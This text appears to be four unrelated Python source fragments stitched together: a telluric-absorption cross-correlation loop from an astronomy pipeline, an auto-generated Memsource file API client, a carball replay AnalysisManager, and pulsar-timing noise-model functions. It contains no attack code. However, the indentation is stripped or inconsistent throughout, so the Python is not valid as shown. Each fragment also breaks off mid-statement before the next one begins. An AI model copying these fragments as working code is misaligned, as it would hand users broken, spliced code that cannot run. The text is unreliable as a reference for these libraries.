            # find order mask (we only want to remove values in this order)
order_mask = orders == order_num
# apply low snr mask to spectrum
spectrum[order_mask] = np.nan
    # for numerical stability, remove NaNs. Setting to zero biases a bit
# the CCF, but this should be OK after we converge
spectrum[~np.isfinite(spectrum)] = 0.0
spectrum[spectrum < 0.0] = 0.0
# ----------------------------------------------------------------------
# scanning range for the ccf computations
drange = np.arange(-ccf_scan_range, ccf_scan_range + 1.0, 1.0)
# get species line lists from file
mask_others, mask_water = get_sp_linelists(params)
# storage for the ccfs
ccf_others = np.zeros_like(drange, dtype=float)
ccf_water = np.zeros_like(drange, dtype=float)
# start with no correction of abso to get the CCF
expo_water = 0.0
    # we start at zero to get a velocity measurement even if we may force
# to the airmass
expo_others = 0.0
# keep track of consecutive exponents and test convergence
expo_water_prev = np.inf
expo_others_prev = np.inf
dexpo = np.inf
# storage for the amplitude from fit
amp_water_list = []
amp_others_list = []
# storage for the exponential from fit
expo_water_list = []
expo_others_list = []
# storage for plotting
dd_iterations = []
ccf_water_iterations = []
ccf_others_iterations = []
# ----------------------------------------------------------------------
    # first guess at the velocity of absorption is 0 km/s
dv_abso = 0.0
# set the iteration number
iteration = 0
# just so we have outputs
dv_water, dv_others = np.nan, np.nan
trans = np.ones_like(wavemap)
# set up a qc flag
flag_qc = False
# log progress
WLOG(params, '', TextEntry('40-019-00040'))
# loop around until convergence or 20th iteration
while (dexpo > dexpo_thres) and (iteration < max_iterations):
# set up a qc flag
flag_qc = False
# log progress
args = [iteration, dexpo, expo_water, expo_others, dv_abso * 1000]
WLOG(params, '', TextEntry('40-019-00041', args=args))
# get the absorption spectrum
trans = get_abso_expo(params, wavemap, expo_others, expo_water,
spl_others, spl_water, ww=ker_width,
ex_gau=ker_shape, dv_abso=dv_abso,
ker_thres=ker_thres, wavestart=wavestart,
waveend=waveend, dvgrid=dvgrid)
# divide spectrum by transmission
spectrum_tmp = spectrum / trans
# ------------------------------------------------------------------
# only keep valid pixels (non NaNs)
valid = np.isfinite(spectrum_tmp)
# transmission with the exponent value
valid &= (trans > np.exp(trans_thres))
# ------------------------------------------------------------------
# apply some cuts to very discrepant points. These will be set to zero
# not to bias the CCF too much
cut = np.nanmedian(np.abs(spectrum_tmp)) * trans_siglim
# set NaN and infinite values to zero
spectrum_tmp[~np.isfinite(spectrum_tmp)] = 0.0
# apply cut and set values to zero
spectrum_tmp[spectrum_tmp > cut] = 0.0
# set negative values to zero
spectrum_tmp[spectrum_tmp < 0.0] = 0.0
# ------------------------------------------------------------------
# get the CCF of the test spectrum
# first spline onto the wave grid
spline = mp.iuv_spline(wavemap[valid], spectrum_tmp[valid], k=1, ext=1)
# loop around all scanning points in d
for d_it in range(len(drange)):
            # compute rv scaling factor
scaling = (1 + drange[d_it] / speed_of_light)
# we compute the ccf_others all the time, even when forcing the
# airmass, just to look at its structure and potential residuals
# compute for others
lothers = np.array(mask_others['ll_mask_s']) * scaling
tmp_others = spline(lothers) * np.array(mask_others['w_mask'])
ccf_others[d_it] = np.nanmean(tmp_others[tmp_others != 0.0])
            # compute for water
lwater = np.array(mask_water['ll_mask_s']) * scaling
tmp_water = spline(lwater) * mask_water['w_mask']
ccf_water[d_it] = np.nanmean(tmp_water[tmp_water != 0.0])
# ------------------------------------------------------------------
# subtract the median of the ccf outside the | |
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:<EMAIL>>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class FileApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_url_file(self, body, content_disposition, **kwargs): # noqa: E501
"""Upload file # noqa: E501
Accepts multipart/form-data, application/octet-stream or application/json. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_url_file(body, content_disposition, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RemoteUploadedFileDto body: file (required)
:param str content_disposition: must match pattern `filename\\*=UTF-8''(.+)` (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_url_file_with_http_info(body, content_disposition, **kwargs) # noqa: E501
else:
(data) = self.create_url_file_with_http_info(body, content_disposition, **kwargs) # noqa: E501
return data
def create_url_file_with_http_info(self, body, content_disposition, **kwargs): # noqa: E501
"""Upload file # noqa: E501
Accepts multipart/form-data, application/octet-stream or application/json. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_url_file_with_http_info(body, content_disposition, async_req=True)
>>> result = thread.get()
:param async_req bool
:param RemoteUploadedFileDto body: file (required)
:param str content_disposition: must match pattern `filename\\*=UTF-8''(.+)` (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'content_disposition'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_url_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_url_file`") # noqa: E501
# verify the required parameter 'content_disposition' is set
if ('content_disposition' not in params or
params['content_disposition'] is None):
raise ValueError("Missing the required parameter `content_disposition` when calling `create_url_file`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'content_disposition' in params:
header_params['Content-Disposition'] = params['content_disposition'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/octet-stream', 'multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UploadedFileDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deletes_file(self, file_uid, **kwargs): # noqa: E501
"""Delete file # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_file(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_file_with_http_info(file_uid, **kwargs) # noqa: E501
else:
(data) = self.deletes_file_with_http_info(file_uid, **kwargs) # noqa: E501
return data
def deletes_file_with_http_info(self, file_uid, **kwargs): # noqa: E501
"""Delete file # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_file_with_http_info(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_uid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deletes_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_uid' is set
if ('file_uid' not in params or
params['file_uid'] is None):
raise ValueError("Missing the required parameter `file_uid` when calling `deletes_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_uid' in params:
path_params['fileUid'] = params['file_uid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files/{fileUid}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_file_json(self, file_uid, **kwargs): # noqa: E501
"""Get file # noqa: E501
Get uploaded file as <b>octet-stream</b> or as <b>json</b> based on 'Accept' header # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_json(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_file_json_with_http_info(file_uid, **kwargs) # noqa: E501
else:
(data) = self.get_file_json_with_http_info(file_uid, **kwargs) # noqa: E501
return data
def get_file_json_with_http_info(self, file_uid, **kwargs): # noqa: E501
"""Get file # noqa: E501
Get uploaded file as <b>octet-stream</b> or as <b>json</b> based on 'Accept' header # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_file_json_with_http_info(file_uid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str file_uid: (required)
:return: UploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_uid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_file_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'file_uid' is set
if ('file_uid' not in params or
params['file_uid'] is None):
raise ValueError("Missing the required parameter `file_uid` when calling `get_file_json`") # noqa: E501
collection_formats = {}
path_params = {}
if 'file_uid' in params:
path_params['fileUid'] = params['file_uid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/files/{fileUid}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UploadedFileDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_files(self, **kwargs): # noqa: E501
"""List files # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_files(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:param str name:
:param list[str] types:
:param int created_by:
:param int bigger_than: Size in bytes
:return: PageDtoUploadedFileDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_files_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_files_with_http_info(**kwargs) # noqa: E501
return data
def get_files_with_http_info(self, **kwargs): # noqa: E501
"""List files # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_files_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:param str name:
:param list[str] types:
:param int created_by:
:param int bigger_than: Size in bytes
:return: | |
import logging
import time
from typing import Dict, Callable, Union
import pandas as pd
import json
import os
import gzip
from google.protobuf.json_format import _Printer
from typing.io import IO
from .utils.json_encoder import CarballJsonEncoder
# Resolve this module's own directory so the version file can be found
# regardless of the process's current working directory.
script_path = os.path.abspath(__file__)
# The sibling 'PROTOBUF_VERSION' file holds a JSON-encoded version value;
# it is stamped onto each generated protobuf game (see AnalysisManager.__init__).
with open(os.path.join(os.path.dirname(script_path), 'PROTOBUF_VERSION'), 'r') as f:
    PROTOBUF_VERSION = json.loads(f.read())
from ..analysis.cleaner.cleaner import clean_replay
from ..analysis.saltie_game.metadata.ApiGame import ApiGame
from ..analysis.saltie_game.metadata.ApiMutators import ApiMutators
from ..analysis.saltie_game.metadata.ApiPlayer import ApiPlayer
from ..analysis.saltie_game.metadata.ApiTeam import ApiTeam
from ..analysis.saltie_game.saltie_game import SaltieGame
from ..analysis.stats.stats_manager import StatsManager
from ..analysis.utils.pandas_manager import PandasManager
from ..analysis.utils.proto_manager import ProtobufManager
from ..generated.api import game_pb2
from ..generated.api.player_pb2 import Player
from ..json_parser.game import Game
from ..analysis.events.event_creator import EventsCreator
logger = logging.getLogger(__name__)
class AnalysisManager:
"""
AnalysisManager class takes an initialized Game object and converts the data into a Protobuf and a DataFrame. Then,
that data is used to perform full analysis on the replay.
"""
id_creator = None
timer = None
def __init__(self, game: Game):
self.game = game
self.protobuf_game = game_pb2.Game()
self.protobuf_game.version = PROTOBUF_VERSION
self.id_creator = self._create_player_id_function(game)
self.stats_manager = StatsManager()
self.events_creator = EventsCreator(self.id_creator)
self.should_store_frames = False
self.df_bytes = None
def create_analysis(self, calculate_intensive_events: bool = False, clean: bool = True):
"""
Sets basic metadata, and decides whether analysis can be performed and then passes required parameters
to perform_full_analysis(...); After, stores the DataFrame.
:param calculate_intensive_events: Indicates if expensive calculations should run to include additional stats.
:param clean: Indicates if useless/invalid data should be found and removed.
"""
self._start_time()
player_map = self._get_game_metadata(self.game, self.protobuf_game)
self._log_time("Getting in-game frame-by-frame data...")
data_frame = self._initialize_data_frame(self.game)
self._log_time("Getting important frames (kickoff, first-touch)...")
kickoff_frames, first_touch_frames = self._get_kickoff_frames(self.game, self.protobuf_game, data_frame)
self._log_time("Setting game kickoff frames...")
self.game.kickoff_frames = kickoff_frames
if self._can_do_full_analysis(first_touch_frames):
self._perform_full_analysis(self.game, self.protobuf_game, player_map,
data_frame, kickoff_frames, first_touch_frames,
calculate_intensive_events=calculate_intensive_events,
clean=clean)
else:
self._log_time("Cannot perform analysis: invalid analysis.")
self.protobuf_game.game_metadata.is_invalid_analysis = True
# log before we add the dataframes
# logger.debug(self.protobuf_game)
self._store_frames(data_frame)
def write_json_out_to_file(self, file: IO):
"""
Writes the json data to the specified file, as text.
NOTES:
The data is written as text (i.e. string), and the buffer mode must be 'w'.
E.g. open(file_name, 'w')
:param file: The file object (or a buffer).
"""
if 'b' in file.mode:
raise IOError("Json files can not be binary use open(path,\"w\")")
printer = _Printer()
js = printer._MessageToJsonObject(self.protobuf_game)
json.dump(js, file, indent=2, cls=CarballJsonEncoder)
def write_proto_out_to_file(self, file: IO):
"""
Writes the proto buffer data to the specified file, as bytes.
NOTES:
The data is written as bytes (i.e. in binary), and the buffer mode must be 'wb'.
E.g. open(file_name, 'wb')
The file will NOT be human-readable.
:param file: The file object (or a buffer).
"""
if 'b' not in file.mode:
raise IOError("Proto files must be binary use open(path,\"wb\")")
ProtobufManager.write_proto_out_to_file(file, self.protobuf_game)
def write_pandas_out_to_file(self, file: Union[IO, gzip.GzipFile]):
    """
    Write the serialised pandas data (``self.df_bytes``) to *file* as bytes.

    *file* may be a GzipFile to compress the data frame. It must be opened
    in binary ('wb') mode — or, for gzip objects, in WRITE mode — and the
    output is not human-readable.

    :param file: A writable binary file object, buffer, or GzipFile.
    :raises IOError: If *file* is not opened for binary writing.
    """
    mode = file.mode
    # Regular files expose a string mode; gzip files expose an int constant.
    if isinstance(mode, str) and 'b' not in mode:
        raise IOError("Data frame files must be binary use open(path,\"wb\")")
    if isinstance(mode, int) and mode != gzip.WRITE:
        raise IOError("Gzip compressed data frame files must be opened in WRITE mode.")
    if self.df_bytes is not None:
        file.write(self.df_bytes)
    elif not self.should_store_frames:
        logger.warning("pd DataFrames are not being stored anywhere")
def get_protobuf_data(self) -> game_pb2.Game:
    """
    Return the protobuf data produced by the analysis.

    USAGE: the Protocol Buffer holds the in-game metadata (events, stats);
    treat it as a normal Python object whose fields match the API.
    INFO: the relevant .proto definitions live at
    https://github.com/SaltieRL/carball/tree/master/api and Google's guide is
    at https://developers.google.com/protocol-buffers/docs/overview
    """
    return self.protobuf_game
def get_json_data(self):
    """
    Return the analysis protobuf converted to a json-like object.

    See get_protobuf_data() for details; the json fields are defined by
    https://github.com/SaltieRL/carball/tree/master/api
    """
    return _Printer()._MessageToJsonObject(self.protobuf_game)
def get_data_frame(self) -> pd.DataFrame:
    """
    Return the pandas.DataFrame of in-game frame-by-frame data.

    The index is the consecutive in-game frame number and the 150+ columns
    are (Object, Data) tuples, where Object is a player, the ball or the
    game. Call ``data_frame.info(verbose=True)`` to list every column; see
    https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html
    for general DataFrame documentation.
    """
    return self.data_frame
def _perform_full_analysis(self, game: Game, proto_game: game_pb2.Game, player_map: Dict[str, Player],
                           data_frame: pd.DataFrame, kickoff_frames: pd.DataFrame, first_touch_frames: pd.Series,
                           calculate_intensive_events: bool = False, clean: bool = True):
    """
    Sets some further data, optionally cleans the replay, then performs the
    analysis (event creation followed by stat calculation).

    :param game: The game object (instance of Game). It contains the replay metadata and processed json data.
    :param proto_game: The game's protobuf (instance of game_pb2) (see get_protobuf_data()).
    :param player_map: A map of player online ID to Player protobuf.
    :param data_frame: The game's pandas.DataFrame object (see get_data_frame()).
    :param kickoff_frames: Contains data about the kickoffs.
    :param first_touch_frames: Contains data for frames where touches can actually occur.
    :param calculate_intensive_events: Indicates if expensive calculations should run to include additional stats.
    :param clean: Indicates if useless/invalid data should be found and removed.
    """
    # Game length and per-player time must be set before cleaning/stats.
    self._get_game_time(proto_game, data_frame)
    if clean:
        # Mutates data_frame/proto_game in place to drop invalid data.
        clean_replay(game, data_frame, proto_game, player_map)
    self._log_time("Creating events...")
    self.events_creator.create_events(game, proto_game, player_map, data_frame, kickoff_frames, first_touch_frames,
                                      calculate_intensive_events=calculate_intensive_events)
    self._log_time("Getting stats...")
    self._get_stats(game, proto_game, player_map, data_frame)
def _get_game_metadata(self, game: Game, proto_game: game_pb2.Game) -> Dict[str, Player]:
    """
    Processes protobuf data and sets the respective object fields to correct values.
    Maps each player's online ID (steam unique ID) to their Player protobuf.

    :param game: The game object (instance of Game). It contains the replay metadata and processed json data.
    :param proto_game: The game's protobuf (instance of game_pb2) (see get_protobuf_data()).
    :return: A dictionary keyed by player online ID, valued by the player's protobuf message.
    """
    # Each Api* call below mutates proto_game/game in place; the returned
    # values are intentionally ignored.
    ApiGame.create_from_game(proto_game.game_metadata, game, self.id_creator)
    ApiMutators.create_from_game(proto_game.mutators, game, self.id_creator)
    ApiTeam.create_teams_from_game(game, proto_game, self.id_creator)
    # Adds players to their respective parties.
    ApiGame.create_parties(proto_game.parties, game, self.id_creator)
    player_map = dict()
    for player in game.players:
        # Append a fresh player message to the proto and populate it.
        player_proto = proto_game.players.add()
        ApiPlayer.create_from_player(player_proto, player, self.id_creator)
        player_map[player.online_id] = player_proto
    return player_map
def _get_game_time(self, protobuf_game: game_pb2.Game, data_frame: pd.DataFrame):
    """
    Calculates the game length (total time the game lasted) and sets it on the
    game_metadata.length field; calculates the total time each player spent in
    the game and sets it on the player's time_in_game field.

    :param protobuf_game: The game's protobuf (instance of game_pb2) (see get_protobuf_data()).
    :param data_frame: The game's pandas.DataFrame object (see get_data_frame()).
    """
    # Total game length: sum of frame deltas over frames that belong to
    # actual play (goal_number is set).
    protobuf_game.game_metadata.length = data_frame.game[data_frame.game.goal_number.notnull()].delta.sum()
    for player in protobuf_game.players:
        try:
            # Time in game: frames where the player has a position AND the
            # frame is part of play.
            player.time_in_game = data_frame[
                data_frame[player.name].pos_x.notnull() & data_frame.game.goal_number.notnull()].game.delta.sum()
            player.first_frame_in_game = data_frame[player.name].pos_x.first_valid_index()
        except Exception:
            # BUG FIX: previously a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit. A missing player column (or
            # similar data problem) simply yields zero time in game.
            player.time_in_game = 0
    logger.info("Set each player's in-game times.")
def _get_kickoff_frames(self, game: Game, proto_game: game_pb2.Game, data_frame: pd.DataFrame):
"""
Firstly, fetches kickoff-related data from SaltieGame.
Secondly, checks for edge-cases and corrects errors.
NOTE: kickoff_frames is an array of all in-game frames at each kickoff beginning.
NOTE: first_touch_frames is an array of all in-game frames for each 'First Touch' at kickoff.
:param game: The game object (instance of Game). It contains the replay metadata and processed json data.
:param proto_game: The game's protobuf (instance of game_pb2) (refer to the comment in get_protobuf_data() for more info).
:param data_frame: The game's pandas.DataFrame object (refer to comment in get_data_frame() for more info).
:return: See notes above.
"""
kickoff_frames = SaltieGame.get_kickoff_frames(game)
first_touch_frames = SaltieGame.get_first_touch_frames(game)
if len(kickoff_frames) > len(first_touch_frames):
# happens when the game ends before anyone touches the ball at kickoff
kickoff_frames = kickoff_frames[:len(first_touch_frames)]
for | |
# utils/models.py
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import numpy as np
from enterprise.signals import parameter
from enterprise.signals import selections
from enterprise.signals import signal_base
from enterprise.signals import white_signals
from enterprise.signals import gp_signals
from enterprise.signals import deterministic_signals
from enterprise.signals import utils
from enterprise import constants as const
#### Model component building blocks ####
@signal_base.function
def free_spectrum(f, log10_rho=None):
    r"""
    Free spectral model: the PSD amplitude at each sampling frequency is an
    independent free parameter,

        S(f_i) = \rho_i^2 * T,

    where \rho_i is the free parameter and T is the observation length.
    Each amplitude is repeated twice (sine and cosine component).
    """
    rho_squared = 10 ** (2 * log10_rho)
    return np.repeat(rho_squared, 2)
# Linear-interpolation basis in time, scaled by the nu^-2 chromatic factor.
@signal_base.function
def linear_interp_basis_dm(toas, freqs, dt=30*const.day):
    """Return (basis, avetoas) for DM variations: a time-domain linear
    interpolation basis whose rows are weighted by (1400 / freq)**2."""
    basis, avetoas = utils.linear_interp_basis(toas, dt=dt)
    chromatic_weight = (1400 / freqs) ** 2
    return basis * chromatic_weight[:, None], avetoas
# Linear interpolation in radio frequency.
@signal_base.function
def linear_interp_basis_freq(freqs, df=64):
    """Linear-interpolation basis over radio frequency with spacing *df*."""
    return utils.linear_interp_basis(freqs, dt=df)
# DMX-like signal with a Gaussian (ridge) prior.
@signal_base.function
def dmx_ridge_prior(avetoas, log10_sigma=-7):
    """Constant diagonal prior variance sigma**2 for each averaged TOA."""
    variance = (10 ** log10_sigma) ** 2
    return variance * np.ones_like(avetoas)
# Quasi-periodic kernel for DM variations.
@signal_base.function
def periodic_kernel(avetoas, log10_sigma=-7, log10_ell=2, gam_p=1, p=1):
    """Quasi-periodic covariance over averaged TOAs plus a small diagonal
    jitter term (sigma/500)**2 for numerical stability."""
    tau = np.abs(avetoas[None, :] - avetoas[:, None])
    sigma = 10 ** log10_sigma
    ell = 10 ** log10_ell * const.day  # length scale: days -> seconds
    p *= 3.16e7                        # period: years -> seconds
    jitter = np.eye(tau.shape[0]) * (sigma / 500) ** 2
    return sigma ** 2 * np.exp(-tau ** 2 / 2 / ell ** 2
                               - gam_p * np.sin(np.pi * tau / p) ** 2) + jitter
# Squared-exponential kernel over radio frequency (FD variations).
@signal_base.function
def se_kernel(avefreqs, log10_sigma=-7, log10_lam=np.log10(1000)):
    """SE-style covariance in radio frequency plus a small diagonal jitter.

    NOTE(review): the exponent is -tm**2 / (2 * lam), not / (2 * lam**2) as
    in a textbook SE kernel — preserved as-is; confirm against the priors
    used downstream before changing.
    """
    tm = np.abs(avefreqs[None, :] - avefreqs[:, None])
    lam = 10 ** log10_lam
    sigma = 10 ** log10_sigma
    jitter = np.eye(tm.shape[0]) * (sigma / 500) ** 2
    return sigma ** 2 * np.exp(-tm ** 2 / 2 / lam) + jitter
# Quantization matrix in time and radio frequency to cut down on the kernel size.
@signal_base.function
def get_tf_quantization_matrix(toas, freqs, dt=30*const.day, df=None, dm=False):
    """
    Build a block quantization matrix over (time, radio-frequency) cells.

    :param toas: TOAs [s]
    :param freqs: radio frequencies [MHz]
    :param dt: time-cell width [s]
    :param df: frequency-cell width [MHz]; if None, fixed receiver bands are used
    :param dm: if True, weight rows by the (1400/freq)**2 DM chromatic factor
    :return: (U, labels) where U maps cells to observations and labels holds
        the average TOA and frequency of each cell, sorted by average TOA.
    """
    if df is None:
        dfs = [(600, 1000), (1000, 1900), (1900, 3000), (3000, 5000)]
    else:
        fmin = freqs.min()
        fmax = freqs.max()
        fs = np.arange(fmin, fmax+df, df)
        dfs = [(fs[ii], fs[ii+1]) for ii in range(len(fs)-1)]
    Us, avetoas, avefreqs, masks = [], [], [], []
    for rng in dfs:
        mask = np.logical_and(freqs >= rng[0], freqs < rng[1])
        if any(mask):
            masks.append(mask)
            U, _ = utils.create_quantization_matrix(toas[mask],
                                                    dt=dt, nmin=1)
            avetoa = np.array([toas[mask][idx.astype(bool)].mean()
                               for idx in U.T])
            avefreq = np.array([freqs[mask][idx.astype(bool)].mean()
                                for idx in U.T])
            Us.append(U)
            avetoas.append(avetoa)
            avefreqs.append(avefreq)
    # BUG FIX: np.sum over a *generator* is unreliable (NumPy wraps it as a
    # 0-d object array rather than iterating); the builtin sum is the correct
    # tool for summing a generator of Python ints.
    nc = sum(U.shape[1] for U in Us)
    U = np.zeros((len(toas), nc))
    avetoas = np.concatenate(avetoas)
    idx = np.argsort(avetoas)
    avefreqs = np.concatenate(avefreqs)
    # Stack each band's quantization block into the full matrix.
    nctot = 0
    for ct, mask in enumerate(masks):
        Umat = Us[ct]
        nn = Umat.shape[1]
        U[mask, nctot:nn+nctot] = Umat
        nctot += nn
    if dm:
        weights = (1400/freqs)**2
    else:
        weights = np.ones_like(freqs)
    return U[:, idx] * weights[:, None], {'avetoas': avetoas[idx],
                                          'avefreqs': avefreqs[idx]}
# Kernel is the product of a quasi-periodic time kernel and a
# rational-quadratic frequency kernel.
@signal_base.function
def tf_kernel(labels, log10_sigma=-7, log10_ell=2, gam_p=1,
              p=1, log10_ell2=4, alpha_wgt=2):
    """Product covariance: quasi-periodic in averaged TOA, rational-quadratic
    in averaged frequency, plus a small diagonal jitter term."""
    avetoas = labels['avetoas']
    avefreqs = labels['avefreqs']
    dt_mat = np.abs(avetoas[None, :] - avetoas[:, None])
    df_mat = np.abs(avefreqs[None, :] - avefreqs[:, None])
    sigma = 10 ** log10_sigma
    ell = 10 ** log10_ell * const.day  # time length scale: days -> seconds
    ell2 = 10 ** log10_ell2
    p *= 3.16e7                        # period: years -> seconds
    jitter = np.eye(dt_mat.shape[0]) * (sigma / 500) ** 2
    time_part = sigma ** 2 * np.exp(-dt_mat ** 2 / 2 / ell ** 2
                                    - gam_p * np.sin(np.pi * dt_mat / p) ** 2)
    freq_part = (1 + df_mat ** 2 / 2 / alpha_wgt / ell2 ** 2) ** (-alpha_wgt)
    return time_part * freq_part + jitter
@signal_base.function
def chrom_exp_decay(toas, freqs, log10_Amp=-7,
                    t0=54000, log10_tau=1.7, idx=2):
    """
    Chromatic exponential-dip delay term in TOAs.
    :param t0: time of exponential minimum [MJD]
    :param log10_tau: log10 of the 1/e decay time; the code multiplies
        10**log10_tau by const.day, so the parameter is in days (the old
        note saying [s] did not match the conversion below)
    :param log10_Amp: log10 amplitude of dip
    :param idx: index of chromatic dependence
    :return wf: delay time-series [s]
    """
    t0 *= const.day
    tau = 10**log10_tau * const.day
    # Step down at t0, then exponential recovery, scaled chromatically.
    wf = -10**log10_Amp * np.heaviside(toas - t0, 1) * \
        np.exp(- (toas - t0) / tau)
    return wf * (1400 / freqs) ** idx
@signal_base.function
def chrom_yearly_sinusoid(toas, freqs, log10_Amp=-7, phase=0, idx=2):
    """
    Chromatic annual sinusoid.
    :param log10_Amp: log10 amplitude of sinusoid
    :param phase: initial phase of sinusoid [rad]
    :param idx: index of chromatic dependence
    :return wf: delay time-series [s]
    """
    wf = 10**log10_Amp * np.sin(2 * np.pi * const.fyr * toas + phase)
    # BUG FIX: the waveform was computed but never returned (the function fell
    # through and returned None). Apply the chromatic scaling and return it,
    # matching chrom_exp_decay above and this docstring's :return: contract.
    return wf * (1400 / freqs) ** idx
def which_psrs(psrs, slice_yr=100, min_yr=3, backward=False):
    """Determine which pulsars to use for a time slice.

    :param psrs: list of ``enterprise.Pulsar`` objects
    :param slice_yr: length of the time slice in years; if longer than the
        dataset, all of the data is used
    :param min_yr: minimum data length (years) for a pulsar to be included
    :param backward: True to take the slice from the end of the dataset
    :return: the list of included pulsars

    NOTE: included pulsars are filtered *in place* via ``filter_data``.
    """
    if backward:
        t_end = np.max([p.toas.max() for p in psrs])  # last observation
        t_start = t_end - slice_yr * const.yr
    else:
        t_start = np.min([p.toas.min() for p in psrs])  # first observation
        t_end = t_start + slice_yr * const.yr
    selected = []
    for p in psrs:
